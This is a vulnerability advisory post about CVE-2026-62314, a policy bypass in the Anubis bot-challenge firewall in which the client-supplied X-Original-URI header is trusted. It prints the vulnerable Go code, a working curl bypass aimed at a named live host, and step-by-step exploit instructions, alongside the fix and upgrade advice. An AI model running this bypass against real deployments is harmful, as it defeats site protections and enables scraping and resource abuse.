Anubis, Policy Bypass, CVE-2026-62314 (Medium) -DC-Oct2026-2703

Listen to this Post

CVE-2026-62314 is a policy bypass vulnerability in Anubis, a Web AI Firewall Utility designed to challenge users’ connections to protect upstream resources from scraper bots. The vulnerability exists in the `PathChecker.Check()` function within lib/policy/checker.go, which improperly trusts the client-controlled `X-Original-URI` header before evaluating the actual request path. This flaw allows any HTTP client to bypass Anubis’s bot protection on the default configuration by simply adding a single request header, without solving any challenge. The affected versions are v1.22.0 through v1.25.0, with the vulnerability introduced in commit d1d631a (PR 1015). The root cause is that the `X-Original-URI` header value comes directly from the client request, and the middleware chain never strips it. In reverse proxy mode, an attacker fully controls this header. The default policy imports data/common/keep-internet-working.yaml, which contains path-only ALLOW rules with no other conditions, such as allowing ^/\.well-known/.$. When the `X-Original-URI` header matches one of these regexes, the rule fires as ALLOW and the request is forwarded upstream without any challenge or JWT check. This represents a classic case of insecure input handling where user-supplied data is trusted without proper validation. The vulnerability aligns with CWE-20 (Improper Input Validation) and CWE-284 (Improper Access Control). The CVSS 3.1 score is 5.8, rated Medium, with the vector AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N. The issue is fixed in version 1.26.0-pre1, where client-controlled headers are no longer trusted for security decision-making. Security recommendations include implementing strict header validation policies and ensuring client-supplied values are never directly used in access control decisions without additional verification.

DailyCVE Form:

Platform: Anubis
Version: 1.22.0-1.25.0
Vulnerability: Policy Bypass
Severity: Medium
date: 2026-07-15

Prediction: 2026-07-16

What Undercode Say:

Normal request, gets challenged:
curl -s https://anubis.techaro.lol/ | grep -o "<>.</>"
Bypass, gets upstream content:
curl -s -H "X-Original-URI: /.well-known/x" https://anubis.techaro.lol/ | grep -o "<>.</>"
func (pc PathChecker) Check(r http.Request) (bool, error) {
originalUrl := r.Header.Get("X-Original-URI")
if originalUrl != "" {
if pc.regexp.MatchString(originalUrl) {
return true, nil
}
}
if pc.regexp.MatchString(r.URL.Path) {
return true, nil
}
return false, nil
}
- name: well-known
path_regex: ^/.well-known/.$
action: ALLOW

How Exploit: (Educational Purposes!)

1. Identify an Anubis-protected endpoint.

  1. Craft an HTTP request with the header X-Original-URI: /.well-known/x.
  2. Send the request; the policy checker matches the header against the ALLOW regex, bypassing the challenge and returning the upstream content.

Protection: from this CVE

Strip the `X-Original-URI` header from incoming client requests in the middleware chain before policy evaluation. Upgrade to version 1.26.0-pre1 or later.

Impact:

Attackers can bypass bot protection, leading to data scraping, service abuse, and resource exhaustion. The vulnerability compromises the fundamental security posture of Anubis by enabling unrestricted access to upstream resources.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top